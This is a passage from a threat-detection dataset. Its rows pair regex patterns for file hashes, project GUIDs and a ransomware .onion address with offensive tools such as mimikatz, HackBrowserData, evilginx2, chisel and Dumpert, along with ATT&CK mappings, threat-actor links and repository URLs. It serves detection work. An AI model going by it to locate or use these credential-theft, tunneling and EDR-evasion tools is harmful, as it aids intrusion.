TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22741" "*1c50adeb-53ac-41b9-9c34-7045cffbae45*",".{0,1000}1c50adeb\-53ac\-41b9\-9c34\-7045cffbae45.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation 
tool","https://github.com/gremwell/o365enum","1","0","#GUIDproject","N/A","7","3","267","39","2024-05-02T07:45:31Z","2020-02-18T12:22:50Z","22742" "*1c50edff472ca0901cc9f483e21487dc2c8734e91a10f9426fac07bfea048277*",".{0,1000}1c50edff472ca0901cc9f483e21487dc2c8734e91a10f9426fac07bfea048277.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","22743" "*1c543ea5c50ef8b0b42f835970fa5f553c2ae5c308d2692b51fb476173653cb3*",".{0,1000}1c543ea5c50ef8b0b42f835970fa5f553c2ae5c308d2692b51fb476173653cb3.{0,1000}","offensive_tool_keyword","OpenChromeDumps","OpenChrome Dump used with GrabChrome for credential access","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Yanluowang - Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22744" "*1c55052f6f033698ff4e88528e91070676dd2b74f259f6304a05599e902d7d63*",".{0,1000}1c55052f6f033698ff4e88528e91070676dd2b74f259f6304a05599e902d7d63.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","22745" "*1c5610c15476512d11f83809cd70dd22ffe4a9042aa11ab251d8ecf8f3772bcb*",".{0,1000}1c5610c15476512d11f83809cd70dd22ffe4a9042aa11ab251d8ecf8f3772bcb.{0,1000}","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. 
It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/aboul3la/Sublist3r","1","0","#filehash","N/A","5","10","10300","2148","2024-08-02T00:00:30Z","2015-12-15T00:55:25Z","22746" "*1C5EDA8C-D27F-44A4-A156-6F863477194D*",".{0,1000}1C5EDA8C\-D27F\-44A4\-A156\-6F863477194D.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","#GUIDproject","N/A","9","2","188","38","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z","22747" "*1c6b60ff20f7c26a7436d966fc741ecd05dc2b3326de1ebcd7fcf6142ac24409*",".{0,1000}1c6b60ff20f7c26a7436d966fc741ecd05dc2b3326de1ebcd7fcf6142ac24409.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#filehash","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","22749" "*1c769a377183290cfd533a08f14b9a7b20e618f164720a7857faddad5976bbae*",".{0,1000}1c769a377183290cfd533a08f14b9a7b20e618f164720a7857faddad5976bbae.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT 
samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22751" "*1c7a0b2c6c4f86ed3665aef0e0482cc6c5f9a9daec792714a4da73d94cd93ffa*",".{0,1000}1c7a0b2c6c4f86ed3665aef0e0482cc6c5f9a9daec792714a4da73d94cd93ffa.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22753" "*1c7e49aa70c93b8d84d80679b4b869c58c84e7bacef8dee13aff9837423d8f4d*",".{0,1000}1c7e49aa70c93b8d84d80679b4b869c58c84e7bacef8dee13aff9837423d8f4d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22755" "*1c7e93ed2b3eed1303cc11d09b4fea4b183fb0e7041f9584c81ca4c989d8a46f*",".{0,1000}1c7e93ed2b3eed1303cc11d09b4fea4b183fb0e7041f9584c81ca4c989d8a46f.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","22756" 
"*1c8101652c99416535282e92882538ba9daee459abeb16c1fa1e3f6578a20367*",".{0,1000}1c8101652c99416535282e92882538ba9daee459abeb16c1fa1e3f6578a20367.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22757" "*1c8101652c99416535282e92882538ba9daee459abeb16c1fa1e3f6578a20367*",".{0,1000}1c8101652c99416535282e92882538ba9daee459abeb16c1fa1e3f6578a20367.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - 
Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22758" "*1c841d5d1d34538febdda50a60f9e4f7a9df773a40dccacbd6aaa75595babfdb*",".{0,1000}1c841d5d1d34538febdda50a60f9e4f7a9df773a40dccacbd6aaa75595babfdb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22759" "*1c881e15825d07769929a42b91b42b3093d26ab24f033d43646d238a7d23de49*",".{0,1000}1c881e15825d07769929a42b91b42b3093d26ab24f033d43646d238a7d23de49.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","#filehash","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","22761" "*1c8de7031ee8dbf83ffde0f1d6401dbc9d95059c984290b115bd58c20b86e8a6*",".{0,1000}1c8de7031ee8dbf83ffde0f1d6401dbc9d95059c984290b115bd58c20b86e8a6.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - 
TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22763" "*1c9a4023737f0be81e06da3719ab68310dca400ca15cfb63012949215fb694eb*",".{0,1000}1c9a4023737f0be81e06da3719ab68310dca400ca15cfb63012949215fb694eb.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","#filehash","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","22765" "*1ca83ff934429dfd4ea340013ffc974399cba5d6bf46aa315dd2fd17846ff731*",".{0,1000}1ca83ff934429dfd4ea340013ffc974399cba5d6bf46aa315dd2fd17846ff731.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21972 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/NS-Sp4ce/CVE-2021-21972","1","0","#filehash","N/A","7","5","491","146","2023-06-08T04:01:33Z","2021-02-24T11:14:58Z","22767" "*1cad3b4c47e6f3d4f97c3299b8d1498bd2a4cd3c7eb26f255f693bbcd46fe516*",".{0,1000}1cad3b4c47e6f3d4f97c3299b8d1498bd2a4cd3c7eb26f255f693bbcd46fe516.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","22768" "*1cb076b6d5b6cb781a5af9b1211d2309840a6b47c4998b802fb8667771548e17*",".{0,1000}1cb076b6d5b6cb781a5af9b1211d2309840a6b47c4998b802fb8667771548e17.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","22770" "*1CB9BB2AEE8B6A248427185F165AD3FDDAE8EA923D338C40E93E6F47F1C3F351*",".{0,1000}1CB9BB2AEE8B6A248427185F165AD3FDDAE8EA923D338C40E93E6F47F1C3F351.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","22771" "*1cbb36d4cf2b775b3009d1d33ce8a90c8a321cc30b884250639142cea085ac06*",".{0,1000}1cbb36d4cf2b775b3009d1d33ce8a90c8a321cc30b884250639142cea085ac06.{0,1000}","offensive_tool_keyword","EDRPrison","Leverage a legitimate WFP callout driver to prevent EDR agents from sending telemetry","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/senzee1984/EDRPrison","1","0","#filehash","N/A","10","5","401","37","2024-08-02T18:10:02Z","2024-06-30T01:17:04Z","22772" "*1cbc16fda9baa7412d012fb0de8958299e885fdb47bddae7d5c05431f2efcc32*",".{0,1000}1cbc16fda9baa7412d012fb0de8958299e885fdb47bddae7d5c05431f2efcc32.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs 
network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22773" "*1cbd063601dcb5c5eaab527a17f922ce8b73ddcf7b8efd03da1612737ce0d672*",".{0,1000}1cbd063601dcb5c5eaab527a17f922ce8b73ddcf7b8efd03da1612737ce0d672.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22774" "*1cc45acf429d705ee592af1c9e56ac25f5b5acbc27fe555db5007c8be9cc4c42*",".{0,1000}1cc45acf429d705ee592af1c9e56ac25f5b5acbc27fe555db5007c8be9cc4c42.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22778" "*1cc4fab54263dfa842c80a72b78a9c223894264b9b4f25263d8fdc2f69def8a1*",".{0,1000}1cc4fab54263dfa842c80a72b78a9c223894264b9b4f25263d8fdc2f69def8a1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22779" 
"*1cc9f944c28a83b4c7fc6081800e4385fe5abc7ccd55074038197a966a03cdbb*",".{0,1000}1cc9f944c28a83b4c7fc6081800e4385fe5abc7ccd55074038197a966a03cdbb.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22782" "*1cccdb0227ae73ae4c712460d12cf2fb9316568f2f8ceae6e6e3e101a8552942*",".{0,1000}1cccdb0227ae73ae4c712460d12cf2fb9316568f2f8ceae6e6e3e101a8552942.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1055.011 - T1059.005 - T1059.007","TA0002 - TA0005","N/A","APT32","Exploitation tool","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","#filehash","N/A","8","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","22783" "*1cd05248c2diffczd.zgpnnj5ikwfugnfvmxzn3qaafstcrdwue4eevw2lzx57rx5bfkia6ryd.onion*",".{0,1000}1cd05248c2diffczd\.zgpnnj5ikwfugnfvmxzn3qaafstcrdwue4eevw2lzx57rx5bfkia6ryd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","22785" "*1cdbbd933f2f3b766efcabbe97d13cd5275165a3d67b9dfb0aa6d34fd7a89bfd*",".{0,1000}1cdbbd933f2f3b766efcabbe97d13cd5275165a3d67b9dfb0aa6d34fd7a89bfd.{0,1000}","offensive_tool_keyword","Dispossessor","Bruteforce tools used by Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential 
Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22788" "*1cdd9db6aa54fd65d12bfaa84e98f8297a2780dadf42c42d6f275ec1ff43d36f*",".{0,1000}1cdd9db6aa54fd65d12bfaa84e98f8297a2780dadf42c42d6f275ec1ff43d36f.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22789" "*1cdf39ef6ad31ac88c9e87a1ff987d56fc6101b1bea30b08239ccc6d8560b311*",".{0,1000}1cdf39ef6ad31ac88c9e87a1ff987d56fc6101b1bea30b08239ccc6d8560b311.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","22790" "*1ce610dbd4ac4eaf18555046ad6001ecac4245c8d69eb4f3cc9affa10d37bacb*",".{0,1000}1ce610dbd4ac4eaf18555046ad6001ecac4245c8d69eb4f3cc9affa10d37bacb.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","22791" "*1cf2330bd7746cf855dac61e732dd8105a5a62e97d918e88e8f9c3514ff2d783*",".{0,1000}1cf2330bd7746cf855dac61e732dd8105a5a62e97d918e88e8f9c3514ff2d783.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22792" "*1d015455d5d224c4a3a39c9f43d7c057bd5aebad39b04e831d2fa517d94add09*",".{0,1000}1d015455d5d224c4a3a39c9f43d7c057bd5aebad39b04e831d2fa517d94add09.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22793" "*1d0e8e47b8cada01b881d1685096940d044c0729cfe0071b4c7571c55737d0dc*",".{0,1000}1d0e8e47b8cada01b881d1685096940d044c0729cfe0071b4c7571c55737d0dc.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","22795" "*1d10b68b19d7daf2ec05a7b9d2683b7e4afa81b442781c1884f67517d323c999*",".{0,1000}1d10b68b19d7daf2ec05a7b9d2683b7e4afa81b442781c1884f67517d323c999.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22796" "*1D1B59D9-10AF-40FE-BE99-578C09DB7A2A*",".{0,1000}1D1B59D9\-10AF\-40FE\-BE99\-578C09DB7A2A.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - 
TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#GUIDproject","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","22797" "*1d1d8b1b9afd3d323cd82131faccddc5565475751c9e8e2b5d6bad2f5f387b42*",".{0,1000}1d1d8b1b9afd3d323cd82131faccddc5565475751c9e8e2b5d6bad2f5f387b42.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22798" "*1d259e77687bc50118ed0a0f6e2e1a1d62b21f39c3f9549b729a01e023773252*",".{0,1000}1d259e77687bc50118ed0a0f6e2e1a1d62b21f39c3f9549b729a01e023773252.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#filehash","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","22800" "*1d267caeb15c945b29b8a7c377582036ac1f72e2a977042947f149f099b5ffcb*",".{0,1000}1d267caeb15c945b29b8a7c377582036ac1f72e2a977042947f149f099b5ffcb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22801" "*1d294d6fcae8b9d57d60166f102fd91d63ad88def2ab80eadcac22750f6f3c47*",".{0,1000}1d294d6fcae8b9d57d60166f102fd91d63ad88def2ab80eadcac22750f6f3c47.{0,1000}","offensive_tool_keyword","NativeBypassCredGuard","Bypass Credential Guard by patching WDigest.dll using only 
NTAPI functions","T1558 - T1003.006","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ricardojoserf/NativeBypassCredGuard","1","0","#filehash","N/A","7","3","236","28","2025-04-08T18:58:37Z","2024-12-01T16:58:03Z","22803" "*1d2c6cbd5fc288ffb92db49344a394eba6d3418df04bd6178007a33b8d82178e*",".{0,1000}1d2c6cbd5fc288ffb92db49344a394eba6d3418df04bd6178007a33b8d82178e.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1572 - T1071.001 - T1105","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#filehash","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","22804" "*1d2c6cbd5fc288ffb92db49344a394eba6d3418df04bd6178007a33b8d82178e*",".{0,1000}1d2c6cbd5fc288ffb92db49344a394eba6d3418df04bd6178007a33b8d82178e.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#filehash","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","22805" "*1d2e4fa684a99e31479bcc0e5e14aa7f3c56cce3de71028241a9745c67ebf034*",".{0,1000}1d2e4fa684a99e31479bcc0e5e14aa7f3c56cce3de71028241a9745c67ebf034.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22806" "*1d3480472e9ab2c37d65f2278d4ca4a2fe32ac65953c828fbedddb371ae44cc7*",".{0,1000}1d3480472e9ab2c37d65f2278d4ca4a2fe32ac65953c828fbedddb371ae44cc7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
